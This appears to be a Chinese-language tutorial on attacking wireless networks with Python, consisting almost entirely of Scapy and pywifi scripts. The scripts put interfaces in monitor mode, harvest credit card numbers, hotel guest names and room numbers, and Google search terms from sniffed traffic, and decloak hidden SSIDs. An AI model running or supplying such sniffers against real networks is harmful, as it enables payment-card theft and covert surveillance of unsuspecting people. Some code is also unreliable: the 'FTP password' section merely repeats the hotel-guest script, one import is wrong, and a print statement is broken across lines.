使用Python进行无线网络攻击

PyWifl 模块寻找wifi来源

# -*- coding: UTF-8 -*-
import pywifi

def bies():
  wifi=pywifi.PyWiFi()#创建一个无限对象
  ifaces=wifi.interfaces()[0]#取一个无线网卡
  ifaces.scan()#扫描
  bessis=ifaces.scan_results()
  for i in range(len(bessis)):
    print(bessis[i].ssid, bessis[i].signal)


bies()

Wifl 侦听模块

import os
from scapy.all import *

iface = "en0"

os.system("/usr/sbin/iwconfig " + iface + " mode monitor")

# Dump packets that are not beacons, probe request / responses
def dump_packet(pkt):
    if not pkt.haslayer(Dot11Beacon) and 
       not pkt.haslayer(Dot11ProbeReq) and 
       not pkt.haslayer(Dot11ProbeResp):
        print(pkt.summary())

        if pkt.haslayer(Raw):
            print(hexdump(pkt.load))
        print("
")


while True:
    for channel in range(1, 14):
        os.system("/usr/sbin/iwconfig " + iface + 
                  " channel " + str(channel))
        print("Sniffing on channel " + str(channel))

        sniff(iface=iface,
              prn=dump_packet,
              count=10,
              timeout=3,
              store=0)

用Scapy测试无线网卡的嗅探功能

测试嗅探无线网络的代码

#!/usr/bin/python
#coding=utf-8
from scapy.all import *

def pktPrint(pkt):
    if pkt.haslayer(Dot11Beacon):
        print '[+] Detected 802.11 Beacon Frame'
    elif pkt.haslayer(Dot11ProbeReq):
        print '[+] Detected 802.11 Probe Request Frame'
    elif pkt.haslayer(TCP):
        print '[+] Detected a TCP Packet'
    elif pkt.haslayer(DNS):
        print '[+] Detected a DNS Packet'

conf.iface = 'wlan0mon'
sniff(prn=pktPrint)

使用Python正则表达式嗅探信用卡信息

3种常用的信用卡：Visa、MasterCard和American Express。

#!/usr/bin/python
#coding=utf-8
import re

def findCreditCard(raw):
    # American Express信用卡由34或37开头的15位数字组成
    americaRE = re.findall('3[47][0-9]{13}', raw)
    if americaRE:
        print '[+] Found American Express Card: ' + americaRE[0]

def main():
    tests = []
    tests.append('I would like to buy 1337 copies of that dvd')
    tests.append('Bill my card: 378282246310005 for $2600')
    for test in tests:
        findCreditCard(test)

if __name__ == '__main__':
    main()

接着就加入Scapy来嗅探TCP数据包实现嗅探功能：

#!/usr/bin/python
#coding=utf-8
import re
import optparse
from scapy.all import *

def findCreditCard(pkt):
    raw = pkt.sprintf('%Raw.load%')
    # American Express信用卡由34或37开头的15位数字组成
    americaRE = re.findall('3[47][0-9]{13}', raw)
    # MasterCard信用卡的开头为51~55，共16位数字
    masterRE = re.findall('5[1-5][0-9]{14}', raw)
    # Visa信用卡开头数字为4，长度为13或16位
    visaRE = re.findall('4[0-9]{12}(?:[0-9]{3})?', raw)

    if americaRE:
        print '[+] Found American Express Card: ' + americaRE[0]
    if masterRE:
        print '[+] Found MasterCard Card: ' + masterRE[0]
    if visaRE:
        print '[+] Found Visa Card: ' + visaRE[0]

def main():
    parser = optparse.OptionParser('[*]Usage: python creditSniff.py -i <interface>')
    parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')
    (options, args) = parser.parse_args()

    if options.interface == None:
        print parser.usage
        exit(0)
    else:
        conf.iface = options.interface

    try:
        print '[*] Starting Credit Card Sniffer.'
        sniff(filter='tcp', prn=findCreditCard, store=0)
    except KeyboardInterrupt:
        exit(0)

if __name__ == '__main__':
    main()

嗅探宾馆住客

#!/usr/bin/python
#coding=utf-8
import optparse
from scapy.all import *

def findGuest(pkt):
    raw = pkt.sprintf('%Raw.load%')
    name = re.findall('(?i)LAST_NAME=(.*)&', raw)
    room = re.findall("(?i)ROOM_NUMBER=(.*)'", raw)
    if name:
        print '[+] Found Hotel Guest ' + str(name[0]) + ', Room #' + str(room[0])

def main():
    parser = optparse.OptionParser('[*]Usage: python hotelSniff.py -i <interface>')
    parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')
    (options, args) = parser.parse_args()

    if options.interface == None:
        print parser.usage
        exit(0)
    else:
        conf.iface = options.interface

    try:
        print '[*] Starting Hotel Guest Sniffer.'
        sniff(filter='tcp', prn=findGuest, store=0)
    except KeyboardInterrupt:
        exit(0)

if __name__ == '__main__':
    main()

编写谷歌键盘记录器：

Google搜索，由“q=”开始，中间是要搜索的字符串，并以“&”终止，字符“pg=”后接的是上一个搜索的内容。

#!/usr/bin/python
#coding=utf-8
import optparse
from scapy.all import *

def findGoogle(pkt):
    if pkt.haslayer(Raw):
        payload = pkt.getlayer(Raw).load
        if 'GET' in payload:
            if 'google' in payload:
                r = re.findall(r'(?i)&q=(.*?)&', payload)
                if r:
                    search = r[0].split('&')[0]
                    search = search.replace('q=', '').replace('+', ' ').replace('%20', ' ')
                    print '[+] Searched For: ' + search

def main():
    parser = optparse.OptionParser('[*]Usage: python googleSniff.py -i <interface>')
    parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')
    (options, args) = parser.parse_args()

    if options.interface == None:
        print parser.usage
        exit(0)
    else:
        conf.iface = options.interface

    try:
        print '[*] Starting Google Sniffer.'
        sniff(filter='tcp port 80', prn=findGoogle)
    except KeyboardInterrupt:
        exit(0)

if __name__ == '__main__':
    main()

嗅探FTP登录口令：

#!/usr/bin/python
#coding=utf-8
import optparse
from scapy.all import *

def findGuest(pkt):
    raw = pkt.sprintf('%Raw.load%')
    name = re.findall('(?i)LAST_NAME=(.*)&', raw)
    room = re.findall("(?i)ROOM_NUMBER=(.*)'", raw)
    if name:
        print '[+] Found Hotel Guest ' + str(name[0]) + ', Room #' + str(room[0])

def main():
    parser = optparse.OptionParser('[*]Usage: python hotelSniff.py -i <interface>')
    parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')
    (options, args) = parser.parse_args()

    if options.interface == None:
        print parser.usage
        exit(0)
    else:
        conf.iface = options.interface

    try:
        print '[*] Starting Hotel Guest Sniffer.'
        sniff(filter='tcp', prn=findGuest, store=0)
    except KeyboardInterrupt:
        exit(0)

if __name__ == '__main__':
    main()

侦听无线 802.11 Probe请求

#!/usr/bin/python
#utf-8
from scapy.all import *

interface = 'wlan0mon'
probeReqs = []

def sniffProbe(p):
    if p.haslayer(Dot11ProbeReq):
        netName = p.getlayer(Dot11ProbeReq).info
        if netName not in probeReqs:
            probeReqs.append(netName)
            print '[+] Detected New Probe Request: ' + netName

sniff(iface=interface, prn=sniffProbe)

寻找隐藏网络的802.11信标

def sniffDot11(p):
    if p.haslayer(Dot11Beacon):
        if p.getlayer(Dot11Beacon).info == '':
            addr2 = p.getlayer(Dot11).addr2
            if addr2 not in hiddenNets:
                print '[-] Detected Hidden SSID: with MAC:' + addr2
                hiddenNets.append(addr2)

找出隐藏的802.11网络的网络名

#!/usr/bin/python
#coding=utf-8
import sys
from scapy import *

interface = 'wlan0mon'
hiddenNets = []
unhiddenNets = []

def sniffDot11(p):
    if p.haslayer(Dot11ProbeResp):
        addr2 = p.getlayer(Dot11).addr2
        if (addr2 in hiddenNets) & (addr2 not in unhiddenNets):
            netName = p.getlayer(Dot11ProbeResp).info
            print '[+] Decloaked Hidden SSID : ' + netName + ' for MAC: ' + addr2
            unhiddenNets.append(addr2)

    if p.haslayer(Dot11Beacon):
        if p.getlayer(Dot11Beacon).info == '':
            addr2 = p.getlayer(Dot11).addr2
            if addr2 not in hiddenNets:
                print '[-] Detected Hidden SSID: with MAC:' + addr2
                hiddenNets.append(addr2)

sniff(iface=interface, prn=sniffDot11)